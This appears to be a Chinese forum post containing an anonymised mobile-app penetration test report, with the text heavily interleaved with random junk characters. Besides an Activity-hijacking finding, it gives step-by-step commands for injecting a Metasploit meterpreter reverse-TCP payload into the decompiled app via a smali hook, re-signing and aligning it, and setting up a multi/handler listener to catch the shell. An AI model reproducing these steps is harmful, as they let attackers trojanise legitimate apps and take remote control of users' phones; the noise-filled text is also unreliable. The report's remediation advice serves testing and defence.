% r) l" J/ s" o9 ~+ P. O. ~% u& n4 X7 o' W2 C# a0 D: Z

1 r& j" @" o- P% O0 e' ? / a* y: ?9 d D" i, ^' m- Q0 x   ( F: h/ u. K2 l5 G5 y, J" Y1 `' H2 C. ?) T- h4 T

9 G* R7 p# [. y# Q0 k4 w ( U, m3 ^ x1 A7 O9 x

0 @, f1 q0 \ e2 \3 X! O0 d 4 B) K; |# Y/ |5 c8 x* ~2 b 1-2 测试结果 1 F6 Q+ m a0 n3 z" h * g1 o1 ^, v) N/ ~5 x0 x: k

$ G/ C; |% f% @9 N4 m! n6 Z ) G F5 k. h/ t6 Y7 }5 D/ v& O

8 w, [9 a2 U1 x4 @6 S+ V. ? % I( V. v. }: J1 s% @; `$ i   2 ], d3 G h% r6 C . {: g/ N; t' R. a0 C- D1 N1 Z/ w* r( ^

* Y: r7 n) A; H) M" ^) S, b" F6 ]* i" J - R8 ^ {/ W8 D: `5 m$ t

1 W! a. V0 i8 t4 Y3 L & y" l& Z- E# T; M4 F0 k 2 检测结果                    ( R# _* |/ ?1 v! j, j C8 K( f. \% Q4 h! ?

) n9 c, @! g; C; N* o * ~1 s7 h7 _# \" t) [) _0 L& L+ ]4 }

- [/ h. H( m, K% R $ Z9 J5 }" G9 }# ? _0 p3 M 2.1 某某某 6 R5 D2 ^. z- n3 N. e0 Y 1 t1 I. D/ e# B5 ^

: v6 I- |" H1 R, A1 u0 F5 d 1 Z8 Q( I/ N# f( S

4 X" e. o5 _3 \7 I$ m5 Q+ h3 D- i& _8 w1 ?# W/ Q( s8 t3 B: h 2.1.1检测目标 ' s4 w- y* }( D- r* u# G8 ?, e! [& m7 {# a0 L+ o

$ D0 ~! q3 k5 U) p & j9 r0 b* r4 T% x* V% ]! j' e

w: N/ }7 u7 {- Z2 B6 l ! a d" z! m5 f( b* s# q 目标地址: 某某某某某某APP 7 t, L' {* b' f, n; n' m! ? 6 a2 M9 _( a( N

5 j# L! H5 V X7 N" i& ?4 H 7 x" P4 G: E7 E& W) u, G. s

4 E( T ?* ?: G: L8 P * U5 s+ K1 M3 T' N1 a 2.1.2检测结果 ; Q9 X# B" a! d7 @ : k5 Q3 U8 N8 L. x P! x1 k

K. _6 `, N U, ^6 L ' c+ I2 F/ j& M' N

0 m2 m6 I; Z( z1 A+ y0 d! H0 o 6 s& ?. ~- |- ^% v2 ` 2.1.2.1 : f# Q7 m) A$ T" ^, ?% k# ?0 T$ y % T# Y% L# a2 t

0 J' K* v) Q6 S% d' X : l& t5 }" _# E$ Y

W% h. q0 ]: N, @# E: h ) f" ?% H/ S3 V 漏洞链接地址:某某某某某某APP 3 U6 D6 t4 k9 l, z. w 8 p" K8 q2 m0 v5 a2 W

! @, n, j" f- u" {# q ^3 h, Z0 I4 E# @/ G4 d5 _# g g

' k% k/ Z+ x/ H! u ; r/ k6 {2 a* U5 d% G   Z z8 z& n- P% v2 ?" z4 X2 U $ h }. D% R# e b& X+ q; p

* l' E, r# M4 q7 Q9 o. m$ D" j S1 ~. d; Y! ?- W5 B/ n! }

' }0 T+ l* d4 Q. e . t9 I6 U6 o- @! T( ^( ?5 n q 漏洞分析及取证: % t2 Q" R* e4 @! Y" @ I! r$ H5 j/ x

0 Q! C( Y5 k, e4 `" p1 [2 D# m ) m# s) b5 D- I5 m" S9 L

+ g6 ]: V" m* h5 L3 x1 o9 V , ]- J5 x. n0 d                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: * V* t. e5 [6 F# C8 O, a0 G0 X : q9 h9 s7 y: l( d% x9 S. D, Y& g

. D7 S2 y6 d! d4 O! a/ Y6 l 8 M5 O' w) c, J$ m! P, a

+ ^. H% U! {+ U( ^/ h; {& e. r% K D/ e      ; {" y M% S0 |' D/ V6 f) ?: n0 h% g' I% Q* b; L F

- p8 r& g P% R. g, P5 p" F3 U8 n, J2 C & w) n/ k/ N! u; K

* N9 l' J+ p2 x ! q! p! p: h" K$ N1 S/ s                       , `' g% Z. R% v4 X" @2 a- w " ]! Z3 {8 e! S9 H3 K; O

; x" ~ X4 ^. f; g# y% O7 X: k9 @4 u7 ^6 V

+ n: G! I0 b( b+ i: h : F* _) Q" G# i0 {3 t( O% d! p8 z 5 n8 ^7 Z& R0 N: F5 \/ X9 X% s( h6 B" S ) Y' N- T, }4 m

! j& g: S) h! R+ ^ 3 r; k _3 ]# k( q2 c. u2 s; |

, E2 P( K& G* J% `( Y+ l" ?$ H( ^4 ]6 x8 o9 K- Y1 q8 I8 w - [% @$ j, f! E' g% u/ Z % L0 d' a5 y' X ?$ H: g9 O

& D: C, |4 q" w 7 y5 }: a, i3 r0 @" K+ o

4 t' Q0 @$ \* F2 J3 I# [# ^0 ~) ]7 `: k# Y7 [& h2 y G# i* ], o) S/ R : d c. O# E# {: X+ {, C% q

$ c' O* ]% ?3 b0 j . b5 t0 C8 A3 v" ]! d$ S8 P# o

* f: ~- O: w( `& R" s% g& B9 S2 [1 v& u+ g0 }& Q( D 漏洞危害:高 6 |/ U) B5 P2 U% L: S6 C& p; f% o: C5 l3 ]) z; c

( Z5 a( R0 I/ _ . D) j6 q, l# B
) b8 @2 h2 N1 @- v( f * M3 Q D/ W; w. A2 u " ]: ~' a0 w. S2 ~3 T: G. v/ M( N4 o0 _$ g f0 c) ^& K! t9 Q2 u$ Y3 e0 ?' ^: s' g, {2 d, g, v9 n, b" y# I E) t2 r$ E2 e' s* P* m2 [% F0 I) \/ \1 J, P4 ^* F/ W% ^' P3 Q- K3 ? x& p' W7 H7 y7 U6 o' d8 b" d c% T l# x" [( e9 R. \, }9 M7 F& C/ y J# s* X8 u# u3 P5 @4 f$ Q. l3 U1 t3 o8 T0 U+ G- x2 u5 S9 ^: k9 M1 Z* p6 h$ o9 }- \# s$ u5 {% i6 D. z) o7 S: |3 ]% r8 ~) V Y0 m- i3 R9 w* I9 i1 s: z. X; F/ y& U4 R# x% L6 [( c/ m5 z% L7 ^9 x3 z( x( K7 @ }* m9 p4 e$ s0 U# Z" B/ F/ r1 y- u& h( y0 b$ D: ]0 x# I6 R" i, u# ] G7 j
0 A/ e; [1 w& j" l, @$ }: Q5 V z5 i4 ^) G4 K5 F, `: Z

$ Z- ~8 K w" ]1 e& x1 H: P( I / X' Y1 v: e, D. I J* l 严重程度 `; ]# B4 a3 X/ L* y; y ( L# Y) E: e$ a4 P4 E- f- N

: m4 Z1 P( F5 |9 a7 c: t " F1 h e8 [1 f1 c% Q
& r' V- o6 y8 f. L* G! }2 C1 _) A( A+ p- a: A

$ Q: T" q' f6 x4 { / x' f/ F0 N ~8 }4 G! B 1 G6 y$ R3 L' g9 B' s* _ . u) S3 z, `, Z0 k4 {

8 q" K2 S0 y! @' ? - D5 q: I. e" |1 P c: Y, U3 k
( H, ]3 @9 E5 P9 Y; B: w* b2 j8 b . H. l9 z" m. {. Q

) _+ ^" ?; e1 @) i ' T9 o5 J3 B# ~( i8 U( e7 X 2 x7 y! s+ E" f& { ; e+ j- Y9 d8 R$ @ M

- u+ M" W, |' K5 x: L! p1 r5 L% y4 k9 A A
7 x& a+ s9 t2 X; }8 w ' @) R, ?9 H5 a2 u" z

! Y6 A/ m" z" g. C, \% Y; i . a- e: L+ P( o4 T0 |5 }) |& i * d" J) l; A+ S+ h9 x, ~$ M ; u9 B9 y0 u# A$ |1 b; y$ p

6 x- v6 o3 ?- y2 O) q r; S9 A 7 }+ {2 f* g/ P- y1 B2 e$ {- s0 |
9 _3 E, _7 f( @0 L2 _; F+ ^2 M 7 N* M' L& |+ X+ `8 v

7 F) f4 c/ o" C- I5 `9 Z# {+ J% ?; h3 t( P; ]   ) Q$ d( f# d$ D4 z" c& r + j1 d& B- N7 m* J( }2 W

( x+ C+ I* T7 h" G! s' e5 ? ( ]1 ^9 |7 e8 u' I0 p
j# Q2 U/ S5 K + u7 x- H' L& b* ]; d' z( }

* t; u" E) [9 ? 6 e5 {, u1 z2 h + q# O! t5 t: o. w t9 \0 B " r; h s9 R% G) \

3 y0 F- f. Y) |" Z. I! b 9 n- o5 l0 P4 ?, u0 y4 H9 m9 O) J \" o
! W8 A$ x- U x 5 Q5 R* Y# }$ [& t. C% Z

1 E+ a. _; ^3 z. I, M3 O, K$ C0 c! n! u3 Y9 s S5 |   " u$ q5 W" A0 S% j5 L * X1 p% w e* w' O3 ^ c

" G' ~7 Y8 M2 h. Y8 `& ^; d% k K# o! @( r5 X& S
# W$ e0 s5 a/ g! x! w: C x 5 O& Q, m) L7 B+ L9 L
$ t3 {( q# K9 n. {: } K # n5 W0 ?( f+ [* a

. h7 x- ^1 M3 ~- I 3 z8 c5 v; ?2 T6 x d# v4 ]   ; E' R5 Q z7 \ j+ o: h $ u: c2 d, A; q

- x* a. C* u9 z3 Q2 {5 j5 i % o+ D* z% w% t. A; S) ]: U

$ @% y4 Y( [3 b( r% h* K. W" t8 d4 U* O 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 I p3 U! ~( W1 K8 ]% ] . F( x; f, K% K% n

- Z8 T( G& b, O) B: H# `+ u3 ?7 o+ @, d! |, w

8 L+ j' A& V# z 0 d9 A$ e: ?1 O' R6 R7 @           - S; W4 I. Z6 V 8 ~/ }! r, a# `9 ]/ r

/ i2 V6 W! m' v$ R7 ^( _* k2 f" b8 }0 @' h" j) @

; N: J9 z1 K4 w 8 h7 z! a4 O4 H0 K$ y9 \   ! D. D7 q8 I. E; ]+ q 5 E. a. a3 S3 G: K- L" Y

% p: I2 `% w& x+ B1 ^: V % z1 r& z- U% k) t0 ?! K; w+ j1 B1 ^

5 j. q$ q. U" }. Y* ]# s2 v# r0 r * C' _# _5 c5 } 2.1.2.2 7 j$ }8 x, j5 _5 |; ^0 T4 I 5 c, o! `: K9 u# }- n3 C/ c1 V

# J* E$ o; s: d( p: B1 B/ { - L" M @+ S2 X( w. b X$ c9 [

) u* B z% f5 N5 ~5 H% j3 y3 ?; k$ ]$ [, c, R0 D) q$ N 漏洞链接地址:某某某某某某APP ; ~/ v* u: z9 \3 c : ^- s, x* H# C& M

9 ~, Z- h9 ] k* F2 j- C2 e 0 I! ^* T9 `4 R1 K

$ W* w- }3 k1 U& _. u: q# d ( t5 C. I3 } q5 g8 y9 t 漏洞分析及取证: * S7 z$ l. E# g2 _1 a/ i3 D ! u2 s$ D- f# c* \ c; X; _( B f- A

8 }. }& N7 [! F, g% e. T4 t i. Q& h1 I- M. Z6 V

( j! i( y: K% X* G 8 i2 B5 u2 K3 f7 v$ B" a: C2 Q$ q                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: + z' N! F% p. C! V0 {) S! Y " g2 l7 I, S: J! S

6 X5 @* G. [% i) f1 _: o 3 q4 H- H' g' t/ b/ }, f/ a+ b

5 y+ n' F. W7 y7 W ' K% d& T3 N! G O$ R/ c! f Metasploit 生成木马 apk ) k( P6 |( H6 j: ?5 S! H8 T$ d % D+ ?5 W# `6 W+ j3 S

; R, a; F: s+ Y6 I$ N- j; J2 d6 ^1 F9 H3 S, F

8 }" R( o3 P& v6 `, y( I$ f6 o9 }' ^- Z H1 @8 g- Y- N8 A msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk " A; ~' R9 Z: y7 ^$ v2 N. i6 r. A7 J9 t

2 H( O5 @( t1 i 7 X% K/ S: x0 x* Y, z- g

/ K( ~# n1 S0 d( K4 s! `$ A) Z8 Z d6 u( w: p4 C& [: @ 反编译目标apk和木马apk * t1 l/ x5 o& A7 Z* L8 T( C( b 2 b3 U. L2 Y. { y3 _+ J2 v$ j

, h2 P5 V! V. s 5 d( x7 t8 e" T0 @' v' v& P7 k! n

2 { T h( m h1 { : F% T ]6 A: p apktool d target.apk
2 _0 n( ^( @( H9 E8 |. O% [7 U9 @ 8 N8 [ C7 ^! V& E7 {- p apktool d cockhorse.apk
) ]) I- U2 u/ L( d# K/ t0 _0 R d N % Y% y! U# m _4 M$ W, ~( k

# M8 m- _ W" v t/ k: p. J- R! w2 O" K! b9 \

$ g. z8 s$ L& t) Z5 e4 G8 x" [( B- T# Q8 x) | 木马 apk 注入目标 apk ' y, X7 w: h+ p$ _+ [0 E2 V : k* G1 z" W' ]; M3 A: F- l; [

$ I$ ]* D$ f% Y/ g7 u2 M3 l 4 p& Y/ m( g$ K' ~

' M( u7 D' g) q8 c4 v* k% a1 S$ f, r( a 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
0 B" G6 O7 V& E9 J: B; h " t* E& h% m6 a3 N K invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
& q, y; F1 T6 U/ N0 z1 P8 a( a$ @) a3 i. ^: W# w n

7 A1 J, K A; }; _8 ?. c' F0 I: L1 U) c 6 |7 n$ g9 v4 Z- I

. s) V c# f4 H* }. Y4 |+ _$ P* u. r- e( c: ~6 d7 | 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 - c+ |+ f V* H K6 W " H" }2 W6 Q% k, C$ l

x0 l- v+ u2 @" `" u6 x6 z % M& L1 W( ^5 h$ x9 U

, q4 O; G! N$ K& y$ l9 ?! m% {& B 0 i4 L2 Q- M' H 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ $ m0 J! l! T& Z: a & o% K7 k2 L9 p- o" A& r3 _

9 t; K( @& B6 l/ G9 ~* Q0 ~ 4 ]% [# Y0 `& b

3 N; i4 M: K. Z! Z8 Y# x - R: Q J' _* d! a$ e2 h 回编译生成最终 apk % W$ R! G6 {! z8 z* {% C4 n' t# R4 N5 k' W7 C

/ Y. L# c" g" ~5 A 0 @( T) t9 X2 A$ [6 z

# }( R' T& |" A7 P0 ?( s$ A ; I4 ? H7 C% c 重新打包 5 m) K( [6 r1 E4 I9 e% g- M1 _# v/ n% B d+ ?0 P7 A7 o+ b# {0 R) i1 p

I _1 o3 W6 S8 w. Z3 r ' F2 h$ O4 d ], g. y6 h6 h

1 R5 K# M: R# F" {+ d$ H8 |: C0 ]7 q7 C7 k! D( Z* Q! Z5 b) f; ] apktool b -o repackage.apk target_app_floder % c% z, v; W# S O7 H5 r , y: ?: J- A1 M( x( J# V+ i

7 x. P' ~0 B8 y: f+ h. s ) G" y7 ^! Y5 s' R, d$ u

: V3 ~# K B+ R* ] ( j; u4 e: J: p# S, w7 V 创建签名文件,有的话可忽略此步骤 E2 c) {5 ]4 d0 I5 {0 B1 I9 u7 z# a/ r4 V4 |. h- D d3 J

% K! J4 S( _2 D: v3 [2 d ) K, w: z1 o' o; g7 S

( w7 d& r) J P q- _ % D- `$ `5 N% e. e" G7 W/ d keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                4 V3 K7 k T' ]- a) W% n. { ) Q5 h, H( f. X; _: A7 F

4 z% R! V# S6 A! B/ k. K 4 M& t& c6 a' O ?1 |8 A

1 f r0 x A$ n+ H, I: W/ z/ `* { ) ~, ^& {8 E! y+ U1 Z 签名,以下任选其一 J4 H, K) K( f 6 O) A) f; Y# E6 Z6 C. S

. z9 w) v! ]! d 9 J" G$ _) L$ A7 O. b

8 B* M9 P8 A: Y8 ? Q. S4 N# e. L) o% E jarsigner 方式 # ]& D, D3 M& R5 b! P* e# z+ R* r, C

8 ~* H# U v& h" m9 }. n1 K* } ! i* X1 s: H3 j2 Y+ m C5 I1 [

( |1 T5 W0 Z* I ; [' |9 |# ]9 e0 r jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 1 v& t/ Q- T2 f" B/ a5 p% ? ' g1 K: S/ K$ B% D5 w$ J: ?. P X

- o& T" q- s- h: e2 u$ P ( S4 @2 `3 A1 K* w

# Z6 n1 N. ~6 i5 v $ k/ r4 O( o- p6 v: ^& f) }# k apksigner 方式 9 u" M* ?; q, ^- l- o# e) \- k; r% S6 l7 J

5 E; S' R% K2 ~! q% j P1 I& A5 `1 H6 q

: ^/ X5 u8 s3 X( \* _3 l3 P( H9 ~+ U8 G% s3 r apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 3 `0 } v# ~3 I2 r$ C) q, k6 L ) K- l4 [! w1 x4 a G: } O/ ?

' t& ]' ^$ H& H7 j+ z 2 b0 B8 s9 y% |9 }! ]$ u

/ L0 D9 q; }# E" n8 f3 l: u( k& @6 q 如需要禁用 v2签名 添加选项--v2-signing-enabled false % A# U) U; x, m9 M: i- i8 a* ^+ z' F6 a9 Y$ ]2 l, ]' t

3 B) I3 p( H8 R4 ~) q+ P ' V0 z9 y c! n7 i- `+ @

+ u8 ^+ N/ P1 h6 o! @ ( K+ b N8 [4 R! y5 ?) j% A 验证,以下任选其一 % ^& C c8 w- r+ \; D0 C ~3 j1 N5 ~& ^

* {# ]1 k; y/ o0 ~' ^ " g* L1 P3 w5 |, j _: u }

; R3 g8 p$ a T7 ^( k; Z( T & {; E+ Y) G& o" I2 I jarsigner方式 ' Q/ i' K4 T1 u. S- P' o9 M ( ^5 f& t" S+ e9 N

$ U! K# R0 C' |" Y * g# E$ s$ \: j* P: Z+ f6 Z2 b3 c

- U# E* [" d2 V, H$ g0 z! Y( [ 5 g$ b2 l. E9 P4 j! e% c jarsigner -verify repackaged.apk ) r" [* m# Q8 b" l5 D. _ 9 F$ e. p7 ^6 s- Z1 Y' A5 Y

9 G; s) y0 T& {( P& | e8 O % |( }$ _% k0 I

, J0 x1 T! M3 _( d' u- m * E2 c, L+ O L' x$ C apksigner 方式 9 N3 `! h) b& j . ^# D+ \0 z( C' P, g. q9 u6 x9 p

. i' ^6 o, Y1 Q2 R ) I0 d* w( x# E. V2 i1 n2 w1 H! X7 C

6 H0 e, S/ J- P: L/ X4 N0 y- i: h: F. E4 D$ y A1 }* o* ]0 E( l) p apksigner verify -v --print-certs repackaged.apk " ~$ u0 }+ c% B + a! j: V6 P* {' h; }: c7 O& y( o! b

8 \% }& L0 j) u4 E Z1 H( k/ Y6 ~% \# [- h

. P# h9 Q1 f( O' `6 I% N! i+ l7 M! k, u, q& M: p* R keytool方式 : S6 e0 V5 e, C1 @1 D * @6 [8 D% z3 f4 p- n3 v

: q# G( ?0 z" p8 r; ] 2 R1 p$ w" @6 u8 q

: C: ?- _4 |, K G . v: m$ [5 y0 I; b h0 j: G keytool -printcert -jarfile repackaged.apk % J9 I. V, |/ E 6 l9 q& m2 N, o1 @1 |* k5 Z8 }; m

7 ^$ Z- H. h& H& j0 l . h5 t# k2 [9 }

% |# A- | D# r! G& C2 g3 E: r: ]1 g+ @4 A) M9 |6 ]/ S 对齐 0 H, C: O h# r5 y- R. Z. q 3 P2 \. Y" @, H$ v8 c$ m+ w6 Z

) |# J; h# ^0 l2 o " C5 @/ x% F: \ h4 _: I

3 U7 p$ V; R$ e6 ~" H " U! j% {6 X( Y0 ~ 字节对齐优化 1 M' J6 z( I( [) l1 \3 Z$ V . Y/ }8 \: m5 z* |" E* O4 g

$ J5 S, l3 _, y7 p% F: w, ?- M % F/ p @8 Y' _# { G- Y. x/ a' i

3 \( ^* |" P* n* n$ r! p: f# Z& C 5 J9 a' K+ G' x+ l zipalign -v 4 repackaged.apk final.apk 6 ~' V: H# g1 [: H: u3 t- }- w; M% ] 1 C* L% |; N" v8 E! Z6 h" m

l9 ~+ i0 o5 e8 x" o& r, J5 q, \ * _5 V- T" U9 v% N) C; q

" a! U: G* e# X - q9 j4 w2 Y* u% `, Y# a2 P 检查是否对齐 + X4 d' p& z1 q ?; }/ S) F% ^% G* O

. X8 L6 c: a) \' ^ : _+ D2 P6 K/ c1 {3 [: A

2 j( E& e- Q! e0 h/ V; a9 \0 e7 M1 m5 M zipalign -c -v 4 final.apk % @5 R! Y( Y% M$ {9 `! r 2 k: h: G( R7 F0 F

; W# v b) a8 g7 y, ^ p/ O P. v" |/ h1 {# C8 g$ X* F; k, X P

# ^! {$ `+ ^0 w' o. A: S9 `# A 6 p, W6 O, E9 v 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 0 H; m/ `$ Z. L0 u; Y3 I3 y# \, |8 `1 o, V

2 b3 ^( ^+ u5 S+ x4 _9 L # O( ] M4 a" U, E7 M7 z, p" _

' [% \0 z( d" a% Z) p0 X; B . O' q3 j3 q# r( L5 r" E* W 启动Metasploit控制台,配置参数等待上线 * f. W# I( w9 v- Q* [ " q% e6 L+ S9 f) O% c

& _% B+ \, s) p5 S4 z2 i) H ; x" }- V1 |! w' H% m# [

2 n6 G3 w9 Q: w$ \/ R% y! u : c1 w" M& `' j- C; A 在终端依次输入如下命令 - G3 L) l' B! y% ?2 s v: ^& S, n/ Z; x+ K# q. @7 F8 q2 s

" i& u# ^0 H3 Y" [9 Y % F! |5 r) X) i) [1 [4 |

, F7 ? ~( N& N$ @9 P+ Q4 C9 O) G, f# V msfconsole , r' O/ O- F$ R( C# l0 } , T! h9 Y$ F6 M6 [

% O* ^3 L% x" ^7 q7 u6 b" a 9 e" k0 Z$ r" t- g8 A+ ^

$ m+ C, Z$ Y7 T0 K# b4 K 5 a H: Z* R8 c+ t# F" W( f use exploit/multi/handler 2 N. E1 q4 F$ K4 T0 V5 {+ Q6 x& g0 Q0 l& T( h

' ]( |. C! I/ j! h# C) |. k( M/ d6 Q, S9 X$ o- r3 C1 p9 @& H" T

. Z' m2 r! N) W& c I* l5 q / u" C6 v- c/ s3 ` set PAYLOAD android/meterpreter/reverse_tcp $ A: f/ g6 r' a$ Y# Q# j! Q9 C. n5 G7 Y, U1 h% Z8 I( ~

% o" ?6 P G. W( a( ^( x4 z# b; U2 ]/ v4 e) V. _* L' Q

* |7 B2 ?2 r! E- t" s& h ( b( q- @! o8 Y8 [ set LHOST 192.xxx.xx.xx & c# d+ W% y- @. m. b: ?1 j$ T' q% W4 I, B9 D" l7 |

+ S3 E! s# H) k6 ?6 X2 n) ] . q- O$ d* x$ Q J3 ]! P" K5 f% `

2 l: ~' c" h: K) ~$ r# P/ {& b7 R) ^: O$ y( D* K6 J' Z# I set LPORT 4444 : A: R" W6 w+ j% u" h a # ^ q5 ^: \; e2 b4 O3 [" }

& }" h; `5 x/ c' m $ \6 W& q* g( V0 Q

) G3 Z3 Y. g# ]; ^ & {+ ] t; T$ q7 o! O# l exploit & p D4 G! G& M- x$ c* @5 d) v, r1 Q7 l% n) R

% g; s' c' S5 \) f. m% k3 a 6 v6 w% R, D: j9 S3 \6 ?

0 ]6 f* ~3 U9 W+ P) w8 `! g ; f% L, C7 r' j& v) _ 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               4 c. G O- A' I8 x8 Q+ L7 W0 h1 W. q

" L, w5 Q- B# Y8 Y- \ : S! I0 b( r. h- u

$ F/ d+ z( b. B+ S. x) A- e: n# _& n 漏洞危害:中 & b" V8 n! H" K/ V8 |( B! [ / ^. _, Y& g* s" o4 T* q/ L

3 c i3 T O; _: G1 A \, y) O! U) |$ V
- p: {6 F. E6 ^0 h* i * l% [" C0 }6 h3 S" u. h e+ c ; ^" Z+ D5 {8 \2 u ' E" C0 O7 M7 |* n5 \ ! H5 I7 W, d5 Z- A; e4 t% j6 I' H) m# e/ C8 c$ I: R# j8 e( Z: G" f2 {, W) J' a& u/ q9 c/ c6 `8 Q4 a# I6 }/ l' w# G- T# P& i/ ?$ c9 J! Y3 g5 n( P0 e* w; j/ h& r1 N3 o( N9 q d' C0 k- N% `: _" [' D( |/ u" t/ {9 V% M1 I* I: w; ~( f) @/ P! s0 a) d# D9 C( Z+ L7 t8 m0 C* C6 G- M8 n D/ G* j9 V3 b# \8 t2 [; s) A& y% E' u3 w/ K6 @6 U8 G! u3 p! W/ ?$ s- X% v5 {3 e/ G6 K8 B/ Z5 ^ ~& S. @, b* N6 o9 [$ q3 n* I) z& n ]* L; ]( E0 ?# L( g! c7 j6 K( N9 o4 Q8 n. O4 O; c" r6 R7 h& [4 J2 X1 w I8 Y( E) ]+ ~8 T% Q2 a2 U& {* q
1 M/ S+ {: f. I: L( b" l1 _" l% }/ S7 J$ f% d# I3 A {

4 n1 @2 U9 X6 ~! p" U; P: N& _4 p/ X7 g5 p& s 严重程度 ; q# B- {" V; H9 N' w3 q2 I 4 ?8 v8 a8 C! N

" v `1 \" C" D: u2 x6 [# l, Z - P$ u7 x8 F; H1 o. z- g" c* ]0 T! e
5 A4 X+ t% U2 Y . x' ]/ b8 G4 n/ T

1 |1 J& `; W+ G" l ' u6 }$ U2 V" w/ S" y. G, ~; {# X 1 h: Y3 S/ [) F9 @* v$ y + M, ]- j8 F- G( u5 F( X5 j: J

* G# m4 K- w$ B, A" }3 f/ z, y; S2 X* |) s4 j" W e1 ^
7 k4 O2 Z' i2 W9 l- x! O: h8 ~# W 3 d- ?% Q3 A0 ]. D, C

5 x4 `7 V3 N* ^ 2 v9 L0 z4 a) A: s! r# _0 s ) `! k6 [# {2 h9 O0 |" k6 V 5 B$ S, b( E. v! i6 k) f& _2 g

5 ~( k' d" n3 W* h; ]" l) }; `/ ] 9 z9 Z& X! G; c4 Y4 a! `
" A6 T# }; \3 p* V4 V/ k8 I& m 8 }/ b+ Z( b" s, R- s& y' p7 ]' |

% Z8 l! ^ j" e. V & U% Q6 W0 `( q% p1 j T " U/ A" D" i# F $ R* M9 ~8 K g0 K# B9 ]1 I; e% o! Z

$ r$ X, } I3 Y7 |( q n7 ]7 h8 H' b1 B9 K# C
8 \0 V3 E# V; b/ [+ ` 1 {! _+ q: T% f% y/ K2 [0 z 7 B8 _; X2 D" z [ v, A , e9 N/ v7 X* g/ h

7 i7 Y& [# x1 \2 _0 ` " d; |- ^0 m* M, w% i- q   # f* x/ L+ R k3 ? # V; Z5 @8 X& X: z; m

: K* y4 O9 B( E) N/ N/ b8 c : p; T+ Z, w+ B; b5 g. G- Z
0 m5 Q x0 g1 g4 c0 ?4 s# @: }% p1 I. Q+ I2 {

$ C2 e$ V& ~7 h3 `/ ^4 l - J% B7 u) U) q! F9 t; ^* f 4 {, g5 z8 E- }( I: C1 p1 a8 c0 _ % [" C; a4 |3 [4 p0 q/ m

% C* V. F- R+ [9 o/ c1 D/ Z; ^ Q9 v3 f* N7 L4 Y% X2 k9 Y
$ b3 n- j- ?$ J( B; W2 i # P% z z- K9 i; \: q$ u+ A: H% L0 N 0 u) C6 Z5 ?! N4 M 0 C) C# H y2 t- @: V% V" y

! r& ]: G! Z# E4 ? 3 M* W/ ]- o7 d+ Y& M" N1 \# g   , u+ q" K+ A5 C/ f ! _, y: |1 N* m1 Z

. j+ `2 b4 ~" t ( A# n4 {* D. h
0 {7 K5 J+ o+ Z: ^ 2 t1 V# N2 o) b- E8 F3 @
# n6 |. l- d8 f4 d 2 Q. ]' J8 z j+ d$ |7 [5 u

; K1 F! @7 h" s- t: s ( D9 t* V S5 f6 e+ v   ( ~; b: R0 a, @+ [* s: d 1 e s s$ J0 Q$ I* i: J! V

0 b3 U+ C. p4 y. w9 ]' @1 Z8 `+ W 1 j' b/ x# x1 M5 F/ t+ p) ^

6 H4 x+ w# U4 Q. V. I* U- W6 ?8 f' h" z 修复方法: ) w# L5 P. U$ a/ c5 m, t / h" q9 f8 d' i6 [) I: A, w5 P

+ i7 C( Q F4 m- S ( l) B) m, o5 B. j. q$ m0 B! G

8 Z) k2 B( q3 w5 h ) t# v% {' c0 ^; _0 ?9 ^               1. APP 启动时应做签名校验防止二次打包。
4 c6 S1 M5 B( O. f; X6 m ! m0 K* o% l( [3 k' `4 l( l+ r 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 + w" |+ m; m2 U) \. R % x7 B5 p( N* C2 f0 g

8 F" ]( d( z; p8 w) r& a$ g 9 s: r8 O* c. S9 \" O 3 G3 P$ u, ?* k$ Y- P9 ^6 W 4 z- V! o" C+ f; s7 _6 Q6 m8 m

0 q4 ~; w& S; S N4 ~6 [+ [4 ]' z6 O) v$ C$ \) \; [( h8 V   0 W2 f& y! z% o: d" F. H/ ]! I : E0 S/ ^% _) C# F- m5 r

' R) e9 M2 O4 D1 J 4 L7 e: u% D% T* X6 ^3 @ $ r6 F# ]2 A' K# X+ |+ @# B9 l ) k, V7 R% s% E$ c4 t/ N/ R0 z

% c F4 W& ?" N* s. z5 s ! c0 X1 p& e; H2 v3 F
, [- @6 P- d/ O4 i3 [/ y* }8 d2 X% x2 {4 L$ s

# z6 t" d3 D2 R8 D0 \ ( {1 ]4 J, _3 p
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表